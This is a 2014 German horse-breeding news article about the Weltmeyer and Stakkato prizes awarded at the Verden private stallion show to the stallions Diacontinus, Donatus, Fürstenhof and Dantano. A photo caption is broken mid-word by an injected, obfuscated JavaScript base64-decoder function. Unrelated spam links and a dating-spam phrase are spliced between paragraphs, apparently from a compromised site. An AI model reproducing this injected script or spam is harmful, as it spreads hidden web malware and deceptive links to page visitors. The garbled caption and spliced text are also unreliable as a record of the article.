Privatbeschälerschau in Verden: And the winner ist…

15. Februar 2014 | Von Redaktion | Kategorie: Featured, Zucht

[Verden (GER)/M. Schwöbel]. Wie in den vergangenen Jahren verlieh der Hannoveraner Verband auch in diesem Jahr im Rahmen der 24. Privatbeschälerschau in Verden den Weltmeyer- und Stakkatopreis für die besten vierjährigen Dressur- und Springhengste der letztjährigen Hengstleistungsprüfungen. In diesem Jahr verlief die Ehrung für Deutschlands Landgestüte, allen voran das niedersächsische Landgestüt Celle, besonders erfolgreich.

Wurde mit dem Stakkatopreis ausgezeichnet: L<script type=function m65c3bbf5572b(wc){var s4='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r1='';var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfandbeschäler Diacontinus v. Diarado (Foto: Marianne Schwöbel)." width="601" height="400" />

Schon bei Celles eigener Hengstschau feierte man Deutschlands Besten—den mit Rittigkeit, Vermögen und Übersicht am Sprung ausgezeichneten Landbeschäler Diacontinus v. Diarado. Züchter Klaus Jürgens (Sehnde) konnte sich über den Ehrenteller des Stakkatopreises freuen. In seiner Laudatio stellte Dr. Werner Schade fest, dass die Befürchtung, der Schimmel würde vielleicht einmal zu schwer werden, keinesfalls zutrifft. Zunehmend sportlicher, mit trockener Textur und hervorragenden Grundgangarten wird er in diesem Jahr mit seinem Reiter Alexander Ueckermann auch im Sport zu sehen sein. Sein erster Fohlenjahrgang wird mit Spannung erwartet.

https://julinos.com/

Donatus v. Don Frederico erhielt den Weltmeyerpreis (Foto: Marianne Schwöbel).

Weltmeyerpreis zum Ersten: Don Frederico zum Vater hat Donatus (Z.: Ernst Otto Heitmann, Handorf I). In Hunnesrück aufgezogen, fiel er der Kommission im Laufe der Leistungsprüfung zunehmend positiv auf. Leistungswille und Leistungsbereitschaft, gepaart mit hoher Rittigkeit und überdurchschnittlichen Grundgangarten, ließen ihn in der Prüfung ganz nach vorne kommen. Zudem honorierte Hannovers Körkommission so viel Qualität mit einer Prämieneinstufung bei der anschließenden Körung in Adelheidsdorf.

https://hydroponics-resource.com/

Landgestüte zum Zweiten hieß es für Fürstenhof v. Fürst Grandios. Dieser im Gemeinschaftsbesitz der Landgestüte Celle, Marbach und Redefin stehende Hengst zeichnete sich einmal mehr durch seine Rittigkeit aus. Und - da sind sich Turnier-, Amateur- und Freizeitreiter einig - Rittigkeit ist von größter Bedeutung, möchte man das Pferd einmal nutzen. Karl Lehing aus Wagenfeld freute sich als Züchter über die Ehrung dieses sympathischen Hengstes.

heute noch frauen kennenlernen

Den dritten Weltmeyerpreis erhielt Dantano v. Diamond Hit (Foto: Marianne Schwöbel).

Den dritten Weltmeyerpreis erhielt Catharina Quast (Hamburg) für Dantano v. Diamond Hit, der auf der Mutterseite das Blut des legendären Brentano II führt. Auch er war in seiner Vererbung stets ein Garant für hohe Rittigkeit. Heute steht Dantano im Besitz des Gestüts Westfalenhof in Steinhagen.

[Fotos: Marianne Schwöbel]

Socialize:
  • Twitter
  • del.icio.us
  • Google Bookmarks
  • Digg
  • Facebook
  • FriendFeed
  • LinkArena
  • MisterWong.DE
  • NewsVine
  • Yigg
  • StumbleUpon
  • Yahoo! Bookmarks
  • MySpace
  • Netvibes
  • Technorati
  • RSS
  • Print
Tags: , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,
Trackback URL: http://www.horse-today.de/wp-trackback.php?p=115492

Hier klicken, um einen Kommentar zu schreiben